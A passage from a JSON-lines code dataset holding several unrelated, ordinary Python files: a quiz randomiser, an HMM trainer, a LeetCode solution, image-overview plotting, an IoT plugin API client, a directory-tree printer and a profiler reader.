python_transformer.pt_python_transformer_interface import change_token_all_occurrences\nfrom python_transformer.pt_python_transformer_interface import change_all_occurrences\n\n#from sympy import latex, sympify\n\n\n\n\n\n# in the question (program)\nadd_changeable('135') # seed\nadd_changeable('a') # the list with numbers\nadd_changeable('b') # the list with strings\nadd_changeable('d') # 2nd list with numbers\nadd_changeable('l') # string to be generated\nadd_changeable('k') # loop variable\nadd_changeable('i')\nadd_changeable('3') # multiplier\nadd_changeable('10') # the list length\nadd_changeable('20') # second for range\nadd_changeable('50') # max int number\n\n\n# answers list name\nadd_changeable(r'\\verb+a+')\nadd_changeable(r'\\verb+b+')\nadd_changeable(r'\\verb+ab+')\nadd_changeable(r'\\verb+d+')\nadd_changeable(r'\\verb+_33+')\n\n#functions to be insered in questions\nadd_changeable(r'\\verb+func1+')\nadd_changeable(r'\\verb+func2+')\nadd_changeable(r'\\verb+func3+')\nadd_changeable(r'\\verb+func4+')\nadd_changeable(r'\\verb+func5+')\n\n\n\n# answers (indexes)\nadd_changeable(r'\\verb+1+')\nadd_changeable(r'\\verb+2+')\nadd_changeable(r'\\verb+3+')\nadd_changeable(r'\\verb+4+')\nadd_changeable(r'\\verb+5+')\n\n# right answers values\nadd_changeable(r'\\verb+11+')\nadd_changeable(r'\\verb+22+')\nadd_changeable(r'\\verb+33+')\nadd_changeable(r'\\verb+44+')\nadd_changeable(r'\\verb+55+')\n\n# wrong answers values\nadd_changeable(r'\\verb+111+')\nadd_changeable(r'\\verb+222+')\nadd_changeable(r'\\verb+333+')\nadd_changeable(r'\\verb+444+')\nadd_changeable(r'\\verb+555+')\n\n\n\n\n\n# variáveis partilhas entre as funções make_transformations e\n# make_transformations_on_results\na = None\nd = None\n_1 = None\n_2 = None\n_3 = None\n_4 = None\n_5 = None\ndecision = None\n_10 = None\n_20 = None\n_33 = None\n_func5 = None\n\n\n\n\n\ndef make_transformations():\n ''\n global a\n global d\n global _1\n global _2\n global _3\n global _4\n global _5\n global _10\n global _20\n global _33\n global decision\n global _func5\n \n # question\n _135 = str(randint(1000000, 2000000))\n [a, b, d, l, k, i] = sample(string.ascii_lowercase, 6)\n _10 = randint(18000, 20000)\n _50 = randint(50, 150)\n _20 = _10 * randint(2, 4)\n _33 = randint(2, 5)\n \n change_all_occurrences('135', _135)\n change_token_all_occurrences('a', a)\n change_token_all_occurrences('b', b)\n change_token_all_occurrences('d', d)\n change_token_all_occurrences('l', l)\n change_token_all_occurrences('k', k)\n change_token_all_occurrences('i', i)\n change_all_occurrences('10', str(_10))\n change_all_occurrences('50', str(_50))\n change_all_occurrences('20', str(_20))\n change_all_occurrences('3', str(_33))\n\n func1 = choice(('[::-1].sort()', '[-1::].sort()', '[:-1:].sort()'))\n func2 = 'sort(reverse=True)'\n func3 = ['sort(key=len)', 'sort()',\n 'sort(key=len, reverse=True)', 'sort(reverse=True)']\n ab = [b, a]\n decision = choice((0, 1, 2, 3))\n # answers\n change_all_occurrences(r'\\verb+_33+',\"\" + r'\\verb+' + str(_33) + '+'+ \"\")\n change_all_occurrences(r'\\verb+a+',\"\" + r'\\verb+' + a + '+'+ \"\")\n change_all_occurrences(r'\\verb+b+',\"\" + r'\\verb+' + b + '+'+ \"\")\n change_all_occurrences(r'\\verb+ab+',\"\" + r'\\verb+' + ab[decision % 2] + '+'+ \"\")\n change_all_occurrences(r'\\verb+d+',\"\" + r'\\verb+' + d + '+'+ \"\")\n change_all_occurrences(r'\\verb+func1+',\"\" + r'\\verb+' + func1 + '+'+ \"\")\n change_all_occurrences(r'\\verb+func2+',\"\" + r'\\verb+' + func2 + '+'+ \"\")\n change_all_occurrences(r'\\verb+func3+',\"\" + r'\\verb+' + func3[decision] + '+'+ \"\")\n # indexes with no repetitions\n _5 = choice((2, 3, 4, 5))\n _func5 = choice(('primeiros', 'ultimos'))\n\n [_3] = sample(range(_50), 1)\n change_all_occurrences(r'\\verb+2+',\"\" + r'\\verb+' + _func5[decision] + '+'+ \"\")\n change_all_occurrences(r'\\verb+3+',\"\" + r'\\verb+' + str(_3) + '+'+ \"\")\n change_all_occurrences(r'\\verb+5+',\"\" + r'\\verb+' + str(_5) + '+'+ \"\")\n change_all_occurrences(r'\\verb+func5+',\"\" + r'\\verb+' + _func5 + '+'+ \"\")\n \n\n\n\ndef make_transformations_on_results(program):\n ''\n # os global aqui não são precisos porque não se faz nesta função\n # atribuição a estas variáveis. Só está para para tornar explícito\n # que são variáveis globais partilhadas\n global a\n global d\n global _1\n global _2\n global _3\n global _4\n global _5\n global decision\n global _10\n global _20\n global _33\n global _func5\n\n \n form = ['crescente', 'decrescente']\n base = ['com base no tamanho da string', 'com base no numero']\n answer = form[0] if decision < 3 else form[1]\n answer += ' '\n answer += base[decision%2]\n the_list = program.get_global(d)\n #print(the_list)\n \n answer_2_true = answer\n times = _33\n for i in range(1, int(_20 / _10)):\n times *= _33\n answer_3_true = the_list[_3]\n answer_4_true = times\n answer_5_true = a + '[:' + str(_5) + ':]' if _func5 == 'primeiros' else a + '[-' + str(_5) +'::]'\n\n # true answers\n \n change_all_occurrences(r'\\verb+22+',\"\" + str(answer_2_true)+ \"\")\n change_all_occurrences(r'\\verb+33+',\"\" + str(answer_3_true)+ \"\")\n change_all_occurrences(r'\\verb+44+',\"\" + str(answer_4_true)+ \"\")\n change_all_occurrences(r'\\verb+55+',\"\" + str(answer_5_true)+ \"\")\n\n # wrong answers\n \n increment3 = choice([1, -1])\n increment4 = choice([1, -1])\n increment5 = choice([1, -1])\n\n answer = form[1] if decision < 3 else form[0]\n answer += ' '\n answer += base[decision%2]\n\n \n answer_2_false = answer\n answer_3_false = the_list[_3] + increment3\n answer_4_false = answer_4_true + increment4\n answer_5_false = a + wrong_5_awnser(_func5, _5)\n \n change_all_occurrences(r'\\verb+222+',\"\" + str(answer_2_false)+ \"\")\n change_all_occurrences(r'\\verb+333+',\"\" + str(answer_3_false)+ \"\")\n change_all_occurrences(r'\\verb+444+',\"\" + str(answer_4_false)+ \"\")\n change_all_occurrences(r'\\verb+555+',\"\" + str(answer_5_false)+ \"\")\n\n\ndef wrong_5_awnser(string, num):\n num = str(num)\n if string == 'primeiros':\n return choice(('['+ num + ']', '[' + num +'::]', '[::' + num +']'))\n return choice(('[-'+ num + ']', '[:-' + num +':]', '[::-' + num +']'))\n\n","sub_path":"03_Implementacao/DataBase/true_or_false_question_working_with_lists/altered_make_transformations_for_code.py","file_name":"altered_make_transformations_for_code.py","file_ext":"py","file_size_in_byte":7990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"60713148","text":"\"\"\"\nChanged OOV handling\n\"\"\"\n\nimport sys\nimport re\n\nfrom collections import defaultdict\n\n# Files\nTAG_FILE = sys.argv[1]\nTOKEN_FILE = sys.argv[2]\nOUTPUT_FILE = sys.argv[3]\n\n# Vocabulary\nvocab = {}\nOOV_WORD = \"OOV\"\nINIT_STATE = \"init\"\nFINAL_STATE = \"final\"\n\n# Transition and emission probabilities\nemissions = {}\ntransitions = {}\ntransitions_total = defaultdict(lambda: 0)\nemissions_total = defaultdict(lambda: 0)\n\nwith open(TAG_FILE) as tag_file, open(TOKEN_FILE) as token_file:\n for tag_string, token_string in zip(tag_file, token_file):\n tags = re.split(\"\\s+\", tag_string.rstrip())\n tokens = re.split(\"\\s+\", token_string.rstrip())\n pairs = zip(tags, tokens)\n\n prevtag = INIT_STATE\n\n for (tag, token) in pairs:\n\n # this block is a little trick to help with out-of-vocabulary (OOV)\n # words. the first time we see *any* word token, we pretend it\n # is an OOV. this lets our model decide the rate at which new\n # words of each POS-type should be expected (e.g., high for nouns,\n # low for determiners).\n\n if tag not in emissions:\n emissions[tag] = defaultdict(lambda: 0)\n if prevtag not in transitions:\n transitions[prevtag] = defaultdict(lambda: 0)\n\n if token not in vocab:\n vocab[token] = 1\n emissions[tag][OOV_WORD] += 1\n # increment the emission/transition observation\n emissions[tag][token] += 1\n emissions_total[tag] += 1\n\n transitions[prevtag][tag] += 1\n transitions_total[prevtag] += 1\n\n prevtag = tag\n\n # don't forget the stop probability for each sentence\n if prevtag not in transitions:\n transitions[prevtag] = defaultdict(lambda: 0)\n\n transitions[prevtag][FINAL_STATE] += 1\n transitions_total[prevtag] += 1\n\n# Write output to output_file\nwith open(OUTPUT_FILE, \"w\") as f:\n for prevtag in transitions:\n for tag in transitions[prevtag]:\n f.write(\"trans {} {} {}\\n\"\n .format(prevtag, tag, transitions[prevtag][tag] / transitions_total[prevtag]))\n\n for tag in emissions:\n for token in emissions[tag]:\n f.write(\"emit {} {} {}\\n\"\n .format(tag, token, emissions[tag][token] / emissions_total[tag]))\n\n\n\n","sub_path":"train_hmm.py","file_name":"train_hmm.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"296584138","text":"\"\"\"\nProblem: Given a pattern and a string str, find if str follows the same pattern.\n Here follow means a full match, such that there is a bijection between a letter in pattern\n and a non-empty word in str.\n Example 1: Input: pattern = \"abba\", str = \"dog cat cat dog\" Output: true\n Example 2: Input:pattern = \"abba\", str = \"dog cat cat fish\" Output: false\n Example 3: Input: pattern = \"aaaa\", str = \"dog cat cat dog\" Output: false\n Example 4: Input: pattern = \"abba\", str = \"dog dog dog dog\" Output: false\n Notes: You may assume pattern contains only lowercase letters,\n and str contains lowercase letters that may be separated by a single space.\nLeetcode: https://leetcode.com/problems/word-pattern/\nTime Complexity: O(n), n is the length of given string\nSpace Complexity: O(n) to store hashmap and string\nLeetcode: Pass\nAny problems: No\n\"\"\"\n\n\nclass Solution:\n def wordPattern(self, pattern, s):\n # Define two hashmaps for two given strings\n smap = {}\n tmap = {}\n\n arr = s.split()\n if len(pattern) != len(arr):\n return False\n\n for i in range(len(pattern)):\n a = pattern[i]\n b = arr[i]\n\n if a not in smap.keys():\n smap[a] = b\n else:\n if smap[a] != b:\n return False\n if b not in tmap.keys():\n tmap[b] = a\n else:\n if tmap[b] != a:\n return False\n return True\n\n\nobj = Solution()\nprint(obj.wordPattern(\"abba\", \"dog cat cat dog\"))\nprint(obj.wordPattern(\"abba\", \"dog cat cat ship\"))","sub_path":"word_pattern.py","file_name":"word_pattern.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"614602011","text":"import numpy as np\nimport os, tqdm\nfrom skimage.io import imread, imsave\nfrom skimage import img_as_bool\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom matplotlib.colors import LinearSegmentedColormap\nfrom textwrap import wrap\nfrom matplotlib import rc\nrc('font', size=17)\nrc('font', family='Arial')\n# rc('font', serif='Times')\nrc('pdf', fonttype=42)\n# rc('text', usetex=True)\nfrom itertools import repeat\nimport multiprocessing\n\nfrom morgana.DatasetTools import io\nfrom morgana.DatasetTools.morphology import computemorphology\nfrom morgana.DatasetTools.morphology import io as ioMorph\nfrom morgana.ImageTools import compositeImageJ\nfrom morgana.ImageTools.morphology import meshgrid\n\n#########################################################################################################################\n\ndef generate_overview_finalMask(input_folder, chosen, saveFig=True, downshape=1, autoclose=False):\n print('### Generating recap image at',input_folder)\n\n flist_in = io.get_image_list(input_folder)\n flist_in = [flist_in[i] for i in range(len(flist_in)) if chosen[i]]\n segment_folder = os.path.join(input_folder,'result_segmentation')\n flist_ma = io.get_image_list(segment_folder, '_finalMask.tif', 'include')\n \n n_img = len(flist_in)\n ncols = 5\n nrows = (n_img-1)//5+1\n\n fig,ax = plt.subplots(figsize=(3*ncols,3*nrows), nrows=nrows, ncols=ncols)\n ax = ax.flatten()\n\n # ### multiprocess\n # file_names = [[flist_in[i],flist_ma[i]] for i in range(n_img)]\n # N_cores = np.clip( int(0.8 * multiprocessing.cpu_count()),1,None )\n\n # pool = multiprocessing.Pool(N_cores)\n # data_list = list( tqdm.tqdm(\n # pool.istarmap(\n # ImageTools.io.load_images_ch0, \n # zip( flist_in, \n # flist_ma,\n # repeat( downshape ) ) ), \n # total = n_img ) )\n # imgs = [data[0] for data in data_list]\n # masks = [data[1] for data in data_list]\n\n ### normal for loop\n imgs = [0. for i in range(n_img)] \n masks = [0. for i in range(n_img)]\n for i in tqdm.tqdm(range(n_img)): \n img = imread(flist_in[i]).astype(float)\n if len(img.shape) == 2:\n img = np.expand_dims(img,0)\n if img.shape[-1] == np.min(img.shape):\n img = np.moveaxis(img, -1, 0)\n imgs[i] = img[0,::downshape,::downshape]\n masks[i] = imread(flist_ma[i])[::downshape,::downshape].astype(float)\n\n ### plotting\n for i in tqdm.tqdm(range(n_img)):\n \n _, filename = os.path.split(flist_in[i])\n filename, _ = os.path.splitext(filename)\n \n ax[i].imshow(imgs[i], 'gray', interpolation='none', vmin=np.percentile(img,1.), vmax=np.percentile(img,99.))\n cmap = mpl.colors.LinearSegmentedColormap.from_list('my_cmap',['black','aqua'],256)\n ax[i].imshow(masks[i], cmap=cmap, interpolation='none',alpha=.3)\n\n ax[i].set_title((\"\\n\".join(wrap(filename, 20))),fontsize=6)\n \n for a in ax:\n a.axis('off')\n for j in range(i+1,len(ax)):\n ax[j].remove()\n \n # plt.show()\n \n if autoclose:\n plt.pause(10)\n plt.close()\n \n\n if saveFig:\n print('### Saving image...')\n # save figure\n _, cond = os.path.split(input_folder)\n fig.savefig(os.path.join(input_folder, 'result_segmentation', cond+'_finalMasks.png'), dpi=300)\n print('### Done saving!')\n\n return fig\n\n#########################################################################################################################\n\ndef generate_composite_movie_cropped(input_folder):\n print('### Generating recap composite movie at',input_folder)\n _, cond = os.path.split(input_folder)\n segment_folder = os.path.join(input_folder,'result_segmentation')\n \n file_extension = '_morpho_params.json'\n fname = os.path.join(segment_folder,cond+file_extension)\n if not os.path.exists(fname):\n props = computemorphology.compute_morphological_info(input_folder)\n ioMorph.save_morpho_params( segment_folder, cond, props )\n else:\n props = ioMorph.load_morpho_params(segment_folder, cond)\n\n flist_in = [ os.path.join(input_folder, i) for i in props['input_file'] ] \n # flist_mask = [ os.path.join(input_folder, i) for i in props['mask_file'] ]\n \n n_imgs = len(flist_in)\n\n dims = np.zeros((n_imgs,2))\n for i in range(n_imgs):\n _slice = np.array(props['slice'][i])\n dims[i][0] = _slice[0].stop-_slice[0].start\n dims[i][1] = _slice[1].stop-_slice[1].start\n \n max_dim = np.max(dims,0).astype(np.uint16)\n # make sure max_dim is even!\n for i in range(len(max_dim)):\n if np.mod(max_dim[i],2)!=0:\n max_dim[i] += 1\n \n img = imread(flist_in[0])\n if len(img.shape) == 2:\n img = np.expand_dims(img,0)\n if img.shape[-1] == np.min(img.shape):\n img = np.moveaxis(img, -1, 0)\n n_ch = img.shape[0]\n movie = np.zeros((n_imgs,1,n_ch,max_dim[0],max_dim[1]))\n \n for i in tqdm.tqdm(range(n_imgs)):\n imgs = imread(flist_in[i])\n if len(imgs.shape) == 2:\n imgs = np.expand_dims(imgs,0)\n if imgs.shape[-1] == np.min(imgs.shape):\n imgs = np.moveaxis(imgs, -1, 0)\n _slice = props['slice'][i]\n center = [int((_slice[0].stop+_slice[0].start)/2),\n int((_slice[1].stop+_slice[1].start)/2)]\n\n _slice_large = [slice(int((center[0]-max_dim[0]/2)),int((center[0]+max_dim[0]/2)),None),\n slice(int((center[1]-max_dim[1]/2)),int((center[1]+max_dim[1]/2)),None)]\n\n # pad the image if the largest mask doesn't fit\n if int((center[0]-max_dim[0]/2))<0:\n w = np.abs(int((center[0]-max_dim[0]/2)))\n imgs = np.stack([np.pad(a,((w,0),(0,0)),mode='constant') for a in imgs])\n center[0] = center[0] + w\n if int((center[1]-max_dim[1]/2))<0:\n w = np.abs(int((center[1]-max_dim[1]/2)))\n imgs = np.stack([np.pad(a,((0,0),(w,0)),mode='constant') for a in imgs])\n center[1] = center[1] + w\n if int((center[0]+max_dim[0]/2))>imgs[0].shape[0]:\n w = np.abs(int((center[0]+max_dim[0]/2-imgs[0].shape[0])))\n imgs = np.stack([np.pad(a,((0,w+10),(0,0)),mode='constant') for a in imgs])\n if int((center[1]+max_dim[1]/2))>imgs[0].shape[1]:\n w = np.abs(int((center[1]+max_dim[1]/2-imgs[0].shape[1])))\n imgs = np.stack([np.pad(a,((0,0),(0,w+10)),mode='constant') for a in imgs])\n\n _slice_large = [slice(int((center[0]-max_dim[0]/2)),int((center[0]+max_dim[0]/2)),None),\n slice(int((center[1]-max_dim[1]/2)),int((center[1]+max_dim[1]/2)),None)]\n\n\n img = np.stack([ a[_slice_large] for a in imgs ])\n \n movie[i,0,...] = img\n\n \n grays = np.tile(np.arange(256, dtype='uint8'), (3, 1))\n green = np.zeros((3, 256), dtype='uint8')\n green[1] = np.arange(256, dtype='uint8')\n # red = np.zeros((3, 256), dtype='uint8')\n # red[0] = np.arange(256, dtype='uint8')\n ijtags = compositeImageJ.imagej_metadata_tags({'LUTs': [grays, green]}, '>')\n imsave(os.path.join(segment_folder,cond+'_composite_recap.tif'),movie.astype(np.uint16), byteorder='>', imagej=True,\n metadata={'mode': 'composite'}, extratags=ijtags)\n \ndef generate_composite_img_cropped(input_folder, downshape=1, keep_open=True):\n print('### Generating recap composite image at',input_folder)\n _, cond = os.path.split(input_folder)\n segment_folder = os.path.join(input_folder,'result_segmentation')\n\n file_extension = '_morpho_params.json'\n fname = os.path.join(segment_folder,cond+file_extension)\n if not os.path.exists(fname):\n props = computemorphology.compute_morphological_info(input_folder)\n ioMorph.save_morpho_params( segment_folder, cond, props )\n else:\n props = ioMorph.load_morpho_params(segment_folder, cond)\n\n flist_in = [ os.path.join(input_folder, i) for i in props['input_file'] ] \n # flist_mask = [ os.path.join(input_folder, i) for i in props['mask_file'] ]\n \n n_img = len(flist_in)\n img = imread(flist_in[0])\n if len(img.shape) == 2:\n img = np.expand_dims(img,0)\n if img.shape[-1] == np.min(img.shape):\n img = np.moveaxis(img, -1, 0)\n n_col = img.shape[0]+1\n\n fig,ax = plt.subplots(figsize=(n_col,n_img), nrows=n_img, ncols=n_col)\n plt.subplots_adjust(top=0.99,left=0.01,right=0.99,bottom=0.01)\n # ax = ax.flatten()\n # print(n_img,len(ax))\n\n for i in tqdm.tqdm(range(n_img)):\n imgs = imread(flist_in[i])\n if len(imgs.shape) == 2:\n imgs = np.expand_dims(imgs,0)\n if imgs.shape[-1] == np.min(imgs.shape):\n imgs = np.moveaxis(imgs, -1, 0)\n _slice = props['slice'][i]\n imgs = np.stack([ a[_slice][::downshape,::downshape] for a in imgs ])\n\n cmaps = [\n mpl.colors.LinearSegmentedColormap.from_list('my_cmap',['black',i],256) for i in ['white','lime','red','aqua','magenta','green','yellow','blue']\n ]\n alphas = [.5]*10\n alphas[0] = 1.\n\n for j in range(len(imgs)):\n ax[i,-1].imshow(imgs[j], cmap=cmaps[j], interpolation='none', vmin=np.percentile(imgs[j],1.), vmax=np.percentile(imgs[j],99.),alpha=alphas[j])\n ax[i,j].imshow(imgs[j], cmap=cmaps[j], interpolation='none', vmin=np.percentile(imgs[j],1.), vmax=np.percentile(imgs[j],99.),alpha=1)\n \n name = os.path.split(flist_in[i])[-1]\n ax[i,int(n_col/2)].set_title((\"\\n\".join(wrap(name, 40))),fontsize=6)\n \n for a in ax.flatten():\n a.axis('off')\n \n fig.show()\n\n print('### Saving image...')\n # save figure\n _, cond = os.path.split(input_folder)\n fig.savefig(os.path.join(segment_folder,cond+'_composite_recap.png'), dpi=300)\n if not keep_open:\n plt.close(fig)\n print('### Done saving!')\n\ndef createCompositeOverview(folder, keep_open=True, create_tif=True):\n if create_tif:\n generate_composite_movie_cropped(folder)\n generate_composite_img_cropped(folder, keep_open=keep_open)\n\n##########################################################################################################################\n\ndef generate_meshgrid_img_cropped(input_folder, keep_open = True):\n print('### Generating recap meshgrid image at',input_folder)\n _, cond = os.path.split(input_folder)\n segment_folder = os.path.join(input_folder,'result_segmentation')\n\n file_extension = '_morpho_params.json'\n fname = os.path.join(segment_folder,cond+file_extension)\n if not os.path.exists(fname):\n props = computemorphology.compute_morphological_info(input_folder)\n ioMorph.save_morpho_params( segment_folder, cond, props )\n else:\n props = ioMorph.load_morpho_params(segment_folder, cond)\n\n flist_in = [ os.path.join(input_folder, i) for i in props['input_file'] ] \n flist_ma = [ os.path.join(input_folder, i) for i in props['mask_file'] ]\n \n n_img = len(flist_in)\n ncols = 5\n nrows = (n_img-1)//5+1\n\n fig,ax = plt.subplots(figsize=(3*ncols,3*nrows), nrows=nrows, ncols=ncols)\n plt.subplots_adjust(top=0.95,left=0.05,right=0.95,bottom=0.05,hspace=0.01,wspace=0.01)\n ax = ax.flatten()\n\n for i in tqdm.tqdm(range(n_img)):\n prop = {key: props[key][i] for key in props}\n\n tangent = prop['tangent']\n midline = prop['midline']\n width = prop['meshgrid_width']\n mesh = prop['meshgrid']\n if not mesh:\n mesh = meshgrid.compute_meshgrid(midline,tangent,width)\n anch = prop['anchor_points_midline']\n\n bf = imread(flist_in[i])\n if len(bf.shape) == 2:\n bf = np.expand_dims(bf,0)\n if bf.shape[-1] == np.min(bf.shape):\n bf = np.moveaxis(bf,-1,0)\n bf = bf[0][prop['slice']]\n ma = img_as_bool( imread(flist_ma[i])[prop['slice']].astype(np.float) )\n\n meshgrid.visualize_meshgrid(midline,tangent,mesh,bf,color='white', ax=ax[i])\n \n ax[i].contour(ma, [0.5], colors='r', alpha=.5)\n ax[i].plot(anch[:,1], anch[:,0], '-or', lw=.5, ms=.5, alpha=.5)\n\n name = os.path.split(flist_in[i])[-1]\n ax[i].set_title((\"\\n\".join(wrap(name, 20))),fontsize=6)\n\n for a in ax:\n a.axis('off')\n for j in range(i+1,len(ax)):\n ax[j].remove()\n\n fig.show()\n \n print('### Saving image...')\n # save figure\n fig.savefig(os.path.join(segment_folder, cond+'_meshgrid_recap.png'), dpi=300)\n if not keep_open:\n plt.close(fig)\n print('### Done saving!')\n\ndef createMeshgridOverview(input_folder, keep_open = True):\n generate_meshgrid_img_cropped(input_folder, keep_open=keep_open)\n\n##########################################################################################################################\n\n","sub_path":"morgana/DatasetTools/morphology/overview.py","file_name":"overview.py","file_ext":"py","file_size_in_byte":13049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"17490594","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport logging\n\nfrom iotronicclient.common import base\nfrom iotronicclient.common.i18n import _\nfrom iotronicclient.common import utils\nfrom iotronicclient import exc\n\nLOG = logging.getLogger(__name__)\n_DEFAULT_POLL_INTERVAL = 2\n\n\nclass Plugin(base.Resource):\n def __repr__(self):\n return \"\" % self._info\n\n\nclass PluginManager(base.CreateManager):\n resource_class = Plugin\n _creation_attributes = ['name', 'code', 'public', 'callable', 'parameters',\n 'extra']\n _resource_name = 'plugins'\n\n def list(self, marker=None, limit=None,\n detail=False, sort_key=None, sort_dir=None, fields=None,\n public=None,\n with_public=False, all_plugins=False):\n \"\"\"Retrieve a list of plugins.\n\n :param marker: Optional, the UUID of a plugin, eg the last\n plugin from a previous result set. Return\n the next result set.\n :param limit: The maximum number of results to return per\n request, if:\n\n 1) limit > 0, the maximum number of plugins to return.\n 2) limit == 0, return the entire list of plugins.\n 3) limit param is NOT specified (None), the number of items\n returned respect the maximum imposed by the Iotronic API\n (see Iotronic's api.max_limit option).\n\n :param detail: Optional, boolean whether to return detailed information\n about plugins.\n\n :param sort_key: Optional, field used for sorting.\n\n :param sort_dir: Optional, direction of sorting, either 'asc' (the\n default) or 'desc'.\n\n :param fields: Optional, a list with a specified set of fields\n of the resource to be returned. Can not be used\n when 'detail' is set.\n\n :param with_public: Optional boolean value to get also public plugins.\n\n :param all_plugins: Optional boolean value to get all plugins.\n\n :returns: A list of plugins.\n\n \"\"\"\n if limit is not None:\n limit = int(limit)\n\n if detail and fields:\n raise exc.InvalidAttribute(_(\"Can't fetch a subset of fields \"\n \"with 'detail' set\"))\n\n filters = utils.common_filters(marker, limit, sort_key, sort_dir,\n fields)\n path = ''\n if not public:\n if with_public:\n filters.append('with_public=true')\n if all_plugins:\n filters.append('all_plugins=true')\n\n if detail:\n path += 'detail'\n\n else:\n path += 'public'\n\n if filters:\n path += '?' + '&'.join(filters)\n\n if limit is None:\n return self._list(self._path(path), \"plugins\")\n else:\n return self._list_pagination(self._path(path), \"plugins\",\n limit=limit)\n\n def get(self, plugin_id, fields=None):\n return self._get(resource_id=plugin_id, fields=fields)\n\n def delete(self, plugin_id):\n return self._delete(resource_id=plugin_id)\n\n def update(self, plugin_id, patch, http_method='PATCH'):\n return self._update(resource_id=plugin_id, patch=patch,\n method=http_method)\n","sub_path":"iotronicclient/v1/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"541522433","text":"import os\r\nimport sys\r\nimport argparse\r\nfrom sys import argv\r\n\r\ncdir = os.getcwd()\r\nonlydirs = False\r\nfout = sys.stdout\r\ntotaldirs = 0\r\ntotalfiles = 0\r\n\r\ndef parseargs():\r\n global onlydirs\r\n global fout\r\n global cdir\r\n parser = argparse.ArgumentParser(description = \"Tree\", prog = \"tree\")\r\n parser.add_argument(\"-d\", dest = \"onlydirs\", help = \"List only dirs\", action = \"store_true\")\r\n parser.add_argument(\"-o\", dest = \"fout\", nargs = '?', type = argparse.FileType('w'), default = sys.stdout)\r\n parser.add_argument(\"cdir\", metavar = \"dir\", nargs = '?', default = os.getcwd())\r\n res = parser.parse_args()\r\n fout = res.fout\r\n onlydirs = res.onlydirs\r\n cdir = res.cdir\r\n \r\n \r\ndef scan(cd = \"\", level = 0, drawvl = True):\r\n global cdir\r\n global fout\r\n global onlydirs\r\n global totaldirs\r\n global totalfiles\r\n dirs = os.listdir(cdir + cd)\r\n vl1 = (drawvl and \"|\") or \" \"\r\n vl2 = \"|\"\r\n if onlydirs:\r\n dirs = [x for x in dirs if os.path.isdir(cdir + os.path.sep + x)]\r\n for x in dirs:\r\n dname = cdir + os.path.sep + x\r\n if x == dirs[len(dirs) - 1]:\r\n vl1 = (not drawvl and \" \") or \"|\"\r\n vl2 = \"`\"\r\n drawvl = not (level == 0)\r\n if os.path.isdir(dname):\r\n totaldirs += 1\r\n elif os.path.isfile(dname):\r\n totalfiles += 1\r\n fout.write((vl1 + \" \") * level + vl2 + \"-- \" + x)\r\n if os.path.islink(dname):\r\n fout.write(\" -> \" + os.readlink(dname))\r\n fout.write(\"\\n\")\r\n if os.path.isdir(dname):\r\n scan(os.path.sep + x, level + 1, drawvl)\r\n \r\n\r\nparseargs()\r\nfout.write(cdir + \"\\n\")\r\nscan()\r\nfout.write(\"Files: \" + str(totalfiles) + \", Direcotries: \" + str(totaldirs))\r\nfout.close()","sub_path":"practice_python/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"3592597","text":"'''\nIneqPy\n\n\n'''\n\nfrom .ineqpy import *\n\n__author__ = \"Maximiliano Greco\"\n__version__ = \"0.0.2\"\n__maintainer__ = \"Maximiliano Greco\"\n__email__ = \"mmngreco@gmail.com\"\n__status__ = \"Production\"\n\nprint(\"IneqPy: A PYTHON PACKAGE TO QUANTITATIVE ANALYSIS OF INEQUALITY LODADED\")","sub_path":"ineqpy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"608460973","text":"# -*- coding: utf-8 -*-\n#\nimport os\nimport pstats\nimport threading\nimport webbrowser\n\nimport tornado.ioloop\nimport tornado.web\n\nfrom .__about__ import __version__\nfrom .module_groups import built_in, built_in_deprecated\n\n\nclass TunaError(Exception):\n pass\n\n\ndef read(filename):\n _, ext = os.path.splitext(filename)\n try:\n return read_import_profile(filename)\n except (TunaError, StopIteration):\n pass\n\n # runtime profile\n return read_runtime_profile(filename)\n\n\ndef read_runtime_profile(prof_filename):\n stats = pstats.Stats(prof_filename)\n\n # One way of picking finding out the root notes would be to loop over\n # stats.stats.items() and check which doesn't have parents. This, however, doesn't\n # work if there are loops in the graph which happens, for example, if exec() is\n # called somewhere in the program. For this reason, find all nodes without parents\n # and simply hardcode ``.\n roots = []\n for item in stats.stats.items():\n key, value = item\n if value[4] == {}:\n roots.append(key)\n default_root = (\"~\", 0, \"\")\n if default_root in stats.stats:\n roots += [default_root]\n\n # Collect children\n children = {key: [] for key in stats.stats.keys()}\n for key, value in stats.stats.items():\n _, _, _, _, parents = value\n for parent in parents:\n children[parent].append(key)\n\n def populate(key, parent):\n if parent is None:\n _, _, selftime, cumtime, parent_times = stats.stats[key]\n parent_times = []\n else:\n _, _, _, _, parent_times = stats.stats[key]\n _, _, selftime, cumtime = parent_times[parent]\n\n # Convert the tuple key into a string\n name = \"{}::{}::{}\".format(*key)\n if len(parent_times) <= 1:\n # Handle children\n # merge dictionaries\n c = [populate(child, key) for child in children[key]]\n c.append({\"name\": name + \"::self\", \"color\": 0, \"value\": selftime})\n out = {\"name\": name, \"color\": 0, \"children\": c}\n else:\n out = {\"name\": name, \"color\": 0, \"value\": cumtime}\n return out\n\n data = {\n \"name\": \"root\",\n \"color\": 0,\n \"children\": [populate(root, None) for root in roots],\n }\n return data\n\n\ndef read_import_profile(filename):\n # The import 